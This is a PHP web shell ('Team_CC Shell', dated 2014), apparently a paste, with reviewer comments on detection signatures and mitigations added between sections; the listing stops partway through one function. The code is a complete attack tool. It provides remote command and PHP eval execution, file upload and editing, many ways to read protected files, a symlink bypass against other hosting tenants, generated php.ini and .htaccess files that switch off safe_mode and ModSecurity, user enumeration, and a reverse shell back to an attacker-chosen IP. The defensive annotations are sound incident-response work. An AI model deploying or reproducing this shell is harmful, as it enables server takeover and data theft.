Team_CC

Team_CC Shell Release V.1

Aug 22nd, 2014
  1. <?php
  2. # Bypass SuHosin
  3. # Virtual
  4. # users 6 ID /etc/passwd
  5.  
  // Hard-coded operator credentials and UI colour for this web shell.
  // The literal username/password strings are static indicators that can be
  // searched for in web roots, backups and uploaded-file quarantine.
  // $uselogin = 1 enables the cookie/POST login gate further down the file.
  6. $user = 'sec_d@rK';
  7. $pass = 'Nodisturbcc';
  8. $uselogin = 1;
  9. $sh3llColor = "green";
  10.  
  // Default database credentials; MySQLReader() and MySQLIReader() pull these
  // in through `global` and use them for their LOAD DATA LOCAL INFILE reads.
  11. # MySQL Info ---------
  12. $DBhost = "localhost";
  13. $DBuser = "root";
  14. $DBpass = "root";
  15. #---------------------
  // Runtime set-up. error_reporting(0) silences PHP errors, set_time_limit(0) /
  // max_execution_time=0 / ignore_user_abort(TRUE) let a request keep running
  // after the client disconnects, and the ini_restore()/ini_set() calls try to
  // loosen safe_mode and open_basedir for this request.
  // NOTE(review): whether the ini changes take effect depends on the PHP version
  // and on how each directive may be changed at runtime; confirm on the affected
  // host. set_magic_quotes_runtime() and safe_mode belong to legacy PHP 5.x,
  // which suggests the file was written for outdated installations.
  // For detection, this exact sequence of calls at the top of a file is a useful
  // static signature.
  16. session_start();
  17. error_reporting(0);
  18. set_magic_quotes_runtime(0);
  19. set_time_limit(0);
  20. ignore_user_abort(TRUE);
  21. ini_restore("safe_mode");
  22. ini_restore("open_basedir");
  23. ini_set('max_execution_time',0);
  24. ini_set('output_buffering',0);
  25. ini_set('safe_mode','Off');
  26.  
  // Working-directory and display-mode state, kept in the PHP session.
  // $dir comes from getcwd() on the first request, from the session when no
  // curDir is posted, and otherwise from POST curDir passed through filter()
  // (filter() is not defined in the visible part of the file).
  // $dir_mode is copied from GET dir_mode into the session without validation.
  // Log indicators: POST field "curDir", query parameter "dir_mode".
  27. // Set Current Directory
  28. if(!$_POST && !$_SESSION['curDir']) {
  29. $dir = getcwd();
  30. $_SESSION['curDir'] = $dir;
  31. } else if(empty($_POST['curDir'])) {
  32. $dir = $_SESSION['curDir'];
  33. } else {
  34. $dir = filter($_POST['curDir']);
  35. $_SESSION['curDir'] = $dir;
  36. }
  37. // Set Dir Mode
  38. if($_GET['dir_mode']) {
  39. $dir_mode = $_GET['dir_mode'];
  40. $_SESSION['dir_mode'] = $dir_mode;
  41. } else {
  42. $dir_mode = $_SESSION['dir_mode'];
  43. }
  44.  
  // Per-request options that are evaluated BEFORE the login check further down:
  //  - POST exe_method names the command-execution primitive (default "exec").
  //  - POST logout clears the "user"/"pass" cookies with inline JavaScript and
  //    writes $_SERVER['PHP_SELF'] into a <script> block unescaped.
  //  - The OS label is guessed from a drive-letter colon in $dir.
  //  - GET info triggers phpinfo(); because this line runs ahead of the
  //    authentication block, the full PHP configuration is printed to any
  //    requester. Look for "?info=" requests when reviewing access logs.
  //  - SafeMode() is defined later in the file.
  // NOTE(review): $SERVER_SOFTWARE is a bare global, so it is presumably only
  // populated when register_globals is enabled.
  45. // Set Usable Command
  46. if($_POST['exe_method']) {
  47. $exec_method = $_POST['exe_method'];
  48. } else {
  49. $exec_method = "exec";
  50. }
  51. # Logout
  52. if($_POST['logout']) {
  53. print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
  54. print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
  55. }
  56. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
  57. if($_GET['info']){phpinfo();}
  58. $safeMode = SafeMode();
  59. $server = substr($SERVER_SOFTWARE,0,120);
  60. $daemon = "";
  61. ?>
  62. <html>
  63. <head>
  64. <title>Team_CC Security Shell :: Team_CC Security Shell</title>
  65. <link rel="shortcut icon" href='http://oi44.tinypic.com/2na8cd4.jpg' />
  66. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
  67. <?php echo CSS($sh3llColor); ?>
  68.  
  69. </head>
  70. <body dir='ltr'>
  71. <?php
  // Login gate for the shell.
  // Access is granted when the cookies "user"/"pass" equal $user / md5($pass),
  // or when POST usrname/passwrd equal $user/$pass; on a successful POST the
  // cookies are set by inline JavaScript. Otherwise the login form is printed
  // and the script exits after footer() (not defined in the visible source).
  // Review notes for incident responders:
  //  - Every comparison is loose (!=, ==) and the cookie value is an unsalted
  //    MD5 of the password.
  //  - When any query-string parameter is present, $user and $pass are
  //    reassigned from $_GET before the POST comparison, so the hard-coded
  //    credentials are not the only values the check accepts. Treat a host
  //    carrying this file as reachable by parties other than whoever planted it.
  //  - $_POST['usrname'] is written into a <script> block without escaping.
  //  - Log indicators: POST fields usrname / passwrd / login, cookies user / pass,
  //    and the alert() text below in responses to failed logins.
  72. # ---------------------------------------#
  73. # Authentication #
  74. #----------------------------------------#
  75. if ($uselogin ==1) {
  76. if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
  77. if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
  78. if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
  79. print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
  80. } else {
  81. if($_POST['usrname']){
  82. print'<script>alert("Go and play in the street man !!");</script>';
  83. }
  84. ?>
  85. <br><br>
  86. <center><img src="http://oi44.tinypic.com/2na8cd4.jpg"><br />
  87. <sy>Team_CC</sy>
  88. </center><br />
  89. <div align="center">
  90. <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
  91. <input dir="ltr" name="usrname" id="username" value="" type="text" size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
  92. <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
  93. <input type="submit" value=" Login " name="login" />
  94. </form>
  95. </div>
  96. <?php
  97. footer();
  98. exit;
  99. }
  100. }
  101. }
  102. ?>
  103. <table cellpadding='0' cellspacing='0' width='100%'>
  104. <tr>
  105. <td width='160'>
  106. <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
  107. <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://oi44.tinypic.com/2na8cd4.jpg' width='100%' height='100%'></a><br>
  108. <center>Team_CC
  109. <p></p>
  110. <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
  111. <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
  112. <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
  113. </select>
  114. </center>
  115. </td>
  116. <td>
  117. <form method="post">
  118. <table width='100%' style="border:none; padding:2px;" >
  119. <tr>
  120. <td width='103'>System</td>
  121. <td width="323"><?php echo $os; ?></td>
  122. <td width="90">Apache Modules</td>
  123. <td width="278"><select ><?php
  124. if(function_exists("apache_get_modules")) {
  125. foreach (apache_get_modules() as $module) {
  126. echo "<option>".$module."</option>";
  127. }
  128. }else {
  129. echo "<option>NONE</option>";
  130. }
  131. ?></select></td>
  132. </tr>
  133. <tr>
  134. <td>uname </td>
  135. <td><a href='http://www.google.com/Team_CCrch?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
  136. <td>Curl</td>
  137. <td><?php echo Curl(); ?></td>
  138. </tr>
  139. <tr>
  140. <td>pwd</td>
  141. <td><?php echo getcwd(); ?></td>
  142. <td>Open Basedir</td>
  143. <td><?php echo openBaseDir(); ?></td>
  144. </tr>
  145. <tr>
  146. <td>whoami</td>
  147. <td><?php echo get_current_user(); ?></td>
  148. <td>Magic_Quotes</td>
  149. <td><?php echo magicQouts(); ?></td>
  150. </tr>
  151. <tr>
  152. <td>Server</td>
  153. <td><?php echo $server; ?></td>
  154. <td>Register Globals</td>
  155. <td><?php echo RegisterGlobals(); ?></td>
  156. </tr>
  157. <tr>
  158. <td>Server Name</td>
  159. <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
  160. <td>Gzip</td>
  161. <td><?php echo Gzip(); ?></td>
  162. </tr>
  163. <tr>
  164. <td>Your IP</td>
  165. <td><?php echo GetRealIP(); ?></td>
  166. <td>Oracle</td>
  167. <td><?php echo Oracle(); ?></td>
  168. </tr>
  169. <tr>
  170. <td>Server IP</td>
  171. <td><a href='http://bing.com/Team_CCrch?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
  172. <td>MSQL</td>
  173. <td><?php echo MSQL(); ?></td>
  174. </tr>
  175. <tr>
  176. <td>PHP Version</td>
  177. <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
  178. <td>MySQL</td>
  179. <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
  180. </tr>
  181. <tr>
  182. <td>Safe Mode</td>
  183. <td><?php echo $safeMode; ?></td>
  184. <td>MySQLi</td>
  185. <td><?php echo MysqlI(); ?></td>
  186. </tr>
  187. <tr>
  188. <td>disable functions</td>
  189. <td><select name="disableFunctions"><?php
  190. $funArray = DisableFunctions();
  191. $funArray = explode(",",$funArray);
  192. sort($funArray);
  193. foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
  194. ?></select>
  195. <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
  196. </td>
  197. <td>MsSQL</td>
  198. <td><?php echo MsSQL(); ?></td>
  199. </tr>
  200. </table>
  201. &nbsp; [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  202. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  203. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  204. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
  205. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
  206. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
  207. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
  208. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
  209. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
  210. <input type="submit" name="find_755" id="find_755" value="Find 755" />
  211. <br>
  212. </form>
  213. </table>
  214.  
  215. <form method="post">
  216. <center>
  217. <textarea cols="150" rows="20" name="result" >
  218. <?php
  // Start of the request dispatcher. Each action is selected by the presence of
  // one POST field, and whatever the action prints lands inside the <textarea>.
  //  - login / no POST : directory listing via ScanDirs()
  //  - CMD_Execute     : CMD_Line is URL-decoded and handed to Exe()
  //  - PHP_Execute     : PHP_Line is URL-decoded and handed to Evaluation(),
  //                      which calls eval()
  //  - UPLOAD_Execute  : each uploaded file is written into the current
  //                      directory under the client-supplied file name
  //  - EDIT_Execute    : the named file is read and printed HTML-escaped
  // filter(), Exe() and ScanDirs() are not defined in the visible source.
  // Detection: these POST field names in request bodies (WAF / mod_security
  // audit logs), and new or modified files appearing next to this script.
  219. chdir($dir);
  220. if($_POST['login'] || !$_POST){echo ScanDirs();}
  221. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
  222. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
  223. else if($_POST['UPLOAD_Execute']) {
  224. for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
  225. if($_FILES['uploadfile']['name'][$i] != '') {
  226. if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  227. else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  228. if($upload) {echo "The File ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
  229. "; }
  230. else { echo "The File ".$_FILES['uploadfile']['name'][$i]." Can't Be Upload :( !
  231. ";}
  232. }
  233. }
  234. }
  235. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
  // Dispatcher branches for writing and reading files.
  //  - SAVE_Execute writes the posted textarea content to FILE_NAME through
  //    GenerateFile() (not defined in the visible source).
  //  - READ_Execute opens READ_Line with fopen(..., 'r+') and then reads it with
  //    whichever primitive READ_Type names. The long list of alternatives exists
  //    so that one of them may still work when others are blocked.
  // Defensive takeaway: listing a few functions in disable_functions does not
  // stop file disclosure on its own; rely on per-site OS users, file-system
  // permissions and removal of unused extensions as well.
  236. else if($_POST['SAVE_Execute']) {
  237. $content = filter($_POST['result']);
  238. if(empty($content)){$content = " ";}
  239. if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
  240. }
  241. else if($_POST['READ_Execute']) {
  242. $path = urldecode(filter($_POST['READ_Line']));
  243. $file = fopen($path,'r+');
  244. if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path))); }
  245. else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
  246. else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
  247. else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
  248. else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
  249. else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
  250. else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
  251. else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
  252. else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
  253. else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
  254. else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
  255. else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
  256. else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
  257. else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
  258. else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
  259. else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
  260. else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
  261. else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
  262. else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
  263. else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
  264. }
  // "Turn Off" action: drops two configuration files into the current directory.
  //  - php.ini asks for safe_mode, disable_functions and open_basedir to be off.
  //  - .htaccess asks for the ModSecurity filter engine to be switched off
  //    (SecFilter* directives), sets GET/POST access rules, and points PHPRC at
  //    the generated php.ini.
  // NOTE(review): both only matter where the server honours per-directory
  // overrides and a per-directory PHPRC; confirm against the host's
  // AllowOverride and PHP handler configuration.
  // Detection / mitigation: alert on php.ini or .htaccess being created or
  // changed inside web roots, and restrict AllowOverride so that security
  // modules and environment variables cannot be altered from .htaccess.
  265. else if($_POST['STOP_Execute']) {
  266. $genTry = GenerateFile("php.ini","
  267. safe_mode = Off
  268. disable_functions = NONE
  269. safe_mode_gid = OFF
  270. open_basedir = OFF");
  271. if($genTry){echo "[+] php.ini Has Been Generated Successfully
  272. ";}
  273. else {echo "[-] Failed to generate php.ini file !!
  274. ";}
  275.  
  276. $genTry = GenerateFile(".htaccess","
  277. <IfModule mod_security.c>
  278. SecFilterEngine Off
  279. SecFilterScanPOST Off
  280. SecFilterCheckURLEncoding Off
  281. SecFilterCheckCookieFormat Off
  282. SecFilterCheckUnicodeEncoding Off
  283. SecFilterNormalizeCookies Off
  284. </IfModule>
  285. <Limit GET POST>
  286. order deny,allow
  287. deny from all
  288. allow from all
  289. </Limit>
  290. <Limit PUT DELETE>
  291. order deny,allow
  292. deny from all
  293. </Limit>
  294. SetEnv PHPRC ".getcwd()."/php.ini
  295. ");
  296. if($genTry){echo "[+] .htaccess Has Been Generated Successfully
  297. ";}
  298. else {echo "[-] Failed to generate .htaccess file !!
  299. ";}
  300. }
  // "Back Connection" action: the web server process opens an outbound TCP
  // connection to the ip/port taken from the POST body.
  //  - "socks" branch: data read from the socket is passed to shell_exec() and
  //    the output is written back.
  //  - "fsockopen" branch: sends the output of uname -a, pwd and id, then loops
  //    on the stream while calling system("whoami").
  // Both branches send the banner " -== Team_CC , Back Connection ==-", which is
  // usable as a network signature.
  // Detection / mitigation: egress filtering for web servers, and alerting when
  // the web server or PHP worker process makes outbound connections or spawns
  // a shell.
  301. else if($_POST['CON_Type'] == "socks") {
  302. $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  303. if($sock < 0){echo "[-] failed to create socket.";}
  304. else {
  305. $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
  306. if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
  307. else {
  308. $send_var = "\n\n -== Team_CC , Back Connection ==-\n$";
  309. socket_write($sock, $send_var, strlen($send_var));
  310. while($input = socket_read($sock, 10000)) {
  311. socket_write($sock, shell_exec($input), 12000);
  312. }
  313. }
  314. }
  315. } else if($_POST['CON_Type'] == "fsockopen") {
  316. $ip = filter(trim($_POST['ip']));
  317. $port = filter(trim($_POST['port']));
  318. if (!empty($ip)) {
  319. $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
  320. if (!$con_fsockopen){
  321. $result = "Error: didnt connect !!!";
  322. } else {
  323. $newLine="\n";
  324. fputs ($con_fsockopen ,"\n\n -== Team_CC , Back Connection ==-\n$");
  325. fputs($con_fsockopen , system("uname -a") .$newLine );
  326. fputs($con_fsockopen , system("pwd") .$newLine );
  327. fputs($con_fsockopen , system("id") .$newLine.$newLine );
  328. while(!feof($con_fsockopen)){
  329. fputs ($con_fsockopen);
  330. $one="[$";
  331. $two="]";
  332. $result= fgets ($con_fsockopen, 8192);
  333. $message = $result;
  334. fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
  335. }
  336. fclose ($con_fsockopen);
  337. }
  338. }
  339. }
  // Shared-hosting reconnaissance actions.
  //  - USERS_1..USERS_5 print local account information through the
  //    GetUsers1()..GetUsers5() helpers defined later in the file.
  //  - forbidden_bypass creates a "forbidden" directory and an .htaccess in it
  //    that serves cc.txt as the index and forces .php/.html to text/plain; the
  //    printed hint tells the operator to place a symlink named cc.txt there.
  //  - find_755 lists /home/*/public_html directories with mode drwxr-xr-x.
  // Detection: a directory named "forbidden" holding this .htaccess, symlinks
  // inside web roots that point outside the owning account.
  // Mitigation: prefer SymLinksIfOwnerMatch over FollowSymLinks, limit
  // AllowOverride, and keep other tenants' home directories unreadable.
  340. else if($_POST['USERS_1']){echo GetUsers1();}
  341. else if($_POST['USERS_2']) {
  342. $array = GetUsers2();
  343. foreach($array as $line)
  344. {echo $line."
  345. ";}
  346. }
  347. else if($_POST['USERS_3']) {
  348. $array = GetUsers3();
  349. foreach($array as $line)
  350. {echo $line."
  351. ";}
  352. }
  353. else if($_POST['USERS_4']) {
  354. $array = GetUsers4();
  355. foreach($array as $line)
  356. {echo $line."
  357. ";}
  358. } else if($_POST['USERS_5']){echo GetUsers5();}
  359. else if($_POST['forbidden_bypass']) {
  360. mkdir("forbidden");
  361. chdir("forbidden");
  362. $forbidden_htaccess = GenerateFile(".htaccess", "
  363. DirectoryIndex cc.txt
  364. HeaderName cc.txt
  365. ReadmeName cc.txt
  366. footerName cc.txt
  367. ErrorDocument 404 /404.html
  368. 404.html = Symlinked cc.txt
  369. Options all
  370. ForceType text/plain
  371. AddType text/plain .php
  372. AddType text/plain .html
  373. AddHandler server-parsed .php
  374. AddHandler txt .php
  375. ");
  376. if($forbidden_htaccess) {
  377. echo "[+] make your symlink as cc.txt in /forbidden/ folder and find the url /forbidden/cc.txt or /forbidden/";
  378. } else {
  379. echo "[-] error with generating .htaccess file.";
  380. }
  381. } else if($_POST['find_755']) {
  382. Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
  383. }
  384. ?></textarea>
  385. <?php
  386. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
  387. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
  388. ";}
  389. ?>
  390. </center></form>
  391. <table width='100%'>
  392. <tr valign="top">
  393. <td width='30%'>
  394. <!-- Command Line -->
  395. <form method='POST' enctype="multipart/form-data">
  396. <table height='72' border='0' id='Box' width="100%">
  397. <tr>
  398. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  399. <td style="background-color:#666;padding-left:10px;">Edit File
  400. <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
  401. </tr>
  402. <tr>
  403. <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
  404. </tr>
  405. </table>
  406. </form>
  407. <!-- End Of Command Line-->
  408.  
  409. </td>
  410. <td width='30%' height='30'>
  411. <!-- Command Line -->
  412. <form method='POST' enctype="multipart/form-data">
  413. <table height='72' border='0' id='Box'>
  414. <tr>
  415. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  416. <td style="background-color:#666;padding-left:10px;">Command Line
  417. <?php echo print_exe_method(); ?>
  418. <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
  419. </td>
  420. </tr>
  421. <tr>
  422. <td height="45" colspan="2">
  423. <?php echo SelectCommand($os); ?>
  424. <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
  425. <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
  426. </tr>
  427. </table>
  428. </form>
  429. <!-- End Of Command Line-->
  430. </td>
  431. <td width='30%' height='30' valign="top">
  432. <!-- Commands Alias-->
  433. <form method='POST' enctype="multipart/form-data">
  434. <table width='100%' height='72' border='0' id='Box'>
  435. <tr>
  436. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  437. <td style="background-color:#666;padding-left:10px;">Upload Files <span style="padding-left:10px;">
  438. <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
  439. <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
  440. </span></td>
  441. </tr>
  442. <tr>
  443. <td height="45" colspan="2">
  444. <input type='file' name='uploadfile[]'>
  445. <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
  446. </tr>
  447. </table>
  448. </form>
  449. <!-- End Of Commands Alias-->
  450. </td>
  451. </tr>
  452. <tr valign="top">
  453. <td width='30%'>
  454. <!-- Commands Alias-->
  455. <form method='POST' enctype="multipart/form-data">
  456. <table width='100%' height='72' border='0' id='Box'>
  457. <tr>
  458. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  459. <td style="background-color:#666;padding-left:10px;">PHP Eval
  460. <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
  461. </tr>
  462. <tr>
  463. <td height="45" colspan="2"><label for="PHP_Line"></label>
  464. <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
  465. fwrite($file,"Hacked");
  466. fclose($file);';}
  467. ?>
  468. </textarea>
  469. <br></td>
  470. </tr>
  471. </table>
  472. </form>
  473. <!-- End Of Commands Alias-->
  474. </td>
  475. <td width='30%' height='30'>
  476. <!-- Commands Alias-->
  477. <form method='POST' enctype="multipart/form-data">
  478. <table width='100%' height='72' border='0' id='Box'>
  479. <tr>
  480. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  481. <td style="background-color:#666;padding-left:10px;">Read Files
  482.  
  483. <select name="READ_Type" >
  484. <option value="file" >file</option>
  485. <option value="fgets" >fgets</option>
  486. <option value="fgetss" >fgetss</option>
  487. <option value="readfile" >readfile</option>
  488. <option value="fread" >fread</option>
  489. <option value="show_source" >show_source</option>
  490. <option value="file_get_contents" >file_get_contents</option>
  491. <option value="tempnam" >tempnam</option>
  492. <option value="copy" >copy</option>
  493. <option value="symlink" >Symlink</option>
  494. <option value="mb_send_mail" >mb_send_mail</option>
  495. <option value="highlight_file" >highlight_file</option>
  496. <option value="curl" >Curl</option>
  497. <option value="imap" >Imap</option>
  498. <option value="mysql" >MySQL</option>
  499. <option value="mysqli" >MySQLI</option>
  500. <option value="ioncube">Ion Cube</option>
  501. <option value="error_log">Error_Log</option>
  502. <option value="include">Include</option>
  503. <option value="id" >ID /etc/passwd</option>
  504. </select>
  505. <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
  506. </tr>
  507. <tr>
  508. <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
  509. </tr>
  510. </table>
  511. </form>
  512. <!-- End Of Commands Alias-->
  513. </td>
  514. <td width='30%' height='30' valign="top">
  515. <!-- Commands Alias-->
  516. <form method='POST' enctype="multipart/form-data">
  517. <table width='100%' height='72' border='0' id='Box'>
  518. <tr>
  519. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  520. <td style="background-color:#666;padding-left:10px;">Back Connection
  521. <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
  522. </tr>
  523. <tr>
  524. <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
  525. <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
  526. <select name="CON_Type" >
  527. <option value="socks">SOCKS</option>
  528. <option value="fsockopen">FSOCKOPEN</option>
  529. </select>
  530. </td>
  531. </tr>
  532. </table>
  533. </form>
  534. <!-- End Of Commands Alias-->
  535. </td>
  536. </tr>
  537. </table>
  538. <?php
  // File-read variant that goes through include().
  // Splits $path into directory and base name (separator chosen from the global
  // $os), sets include_path to the directory and includes the base name, so the
  // file is processed by the include mechanism rather than a read function.
  // Returns nothing; any output comes from the included file itself.
  // Detection: a runtime ini_set("include_path", ...) immediately followed by
  // include() of a request-derived name.
  539. function IncludeReader($path) {
  540. global $os;
  541. if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
  542. $fileName = substr(strrchr($path,$slash),1);
  543. $includePath = substr($path,0,strpos($path,$fileName,0));
  544. ini_set("include_path",$includePath);
  545. include($fileName);
  546. }
  // Account enumeration: lists /var/mail through Exe() (not defined in the
  // visible source) and returns whatever Exe() returns.
  547. function GetUsers1() {
  548. return Exe('ls /var/mail');
  549. }
  // Account enumeration: reads /etc/passwd line by line and returns an array
  // holding the first colon-separated field of each line (the account name).
  550. function GetUsers2() {
  551. $array = array();
  552. $lines = file("/etc/passwd");
  553. foreach($lines as $nr=>$val) {
  554. $str = explode(":",$val);
  555. array_push($array,$str[0]);
  556. }
  557. return $array;
  558. }
  // Account enumeration: returns the entry names found in /home/ (every entry
  // readdir() yields is kept). Returns nothing when /home/ cannot be opened.
  559. function GetUsers3() {
  560. $array = array();
  561. if ($dh = opendir("/home/")) {
  562. while (($file = readdir($dh)) !== false) {
  563. array_push($array,$file);
  564. }
  565. closedir($dh);
  566. return $array;
  567. }
  568. }
  // Account enumeration by nested directory walks under /home/.
  // Three levels of opendir()/readdir() are used and the entry names from the
  // innermost handle are collected; at each level the first readdir() result is
  // read and discarded before the loop. Only the outer handle is closed.
  // Returns the collected names, or nothing when /home/ cannot be opened.
  569. function GetUsers4() {
  570. $dir = "/home/";
  571. $array = array();
  572. if ($dh = opendir($dir)) {
  573. $f = readdir($dh);
  574. while (($f = readdir($dh)) !== false) {
  575. $dh2=opendir($dir."/");
  576. $f2 = readdir($dh2);
  577. while (($f2 = readdir($dh2)) !== false) {
  578. $f2.="/";
  579. $dh3=opendir($dir.$f.$f2);
  580. $f3 = readdir($dh3);
  581. while (($f3 = readdir($dh3)) !== false) {
  582. array_push($array,$f3);
  583. }
  584. }
  585. }
  586. closedir($dh);
  587. return $array;
  588. }
  589. }
  // Returns the resolved path of /etc/passwd via realpath(); as written it
  // yields the path string, not the file's contents.
  590. function GetUsers5(){
  591. return realpath('/etc/passwd');
  592. }
  // File-read variant that routes the data through error_log().
  // The contents of $path are appended (message type 3) to a temporary file
  // named by uniqid() in the current directory, read back, and the temporary
  // file is deleted. Returns the content read back.
  // Detection: short-lived files with uniqid()-style names appearing next to
  // the script.
  593. function ErrorLog($path){
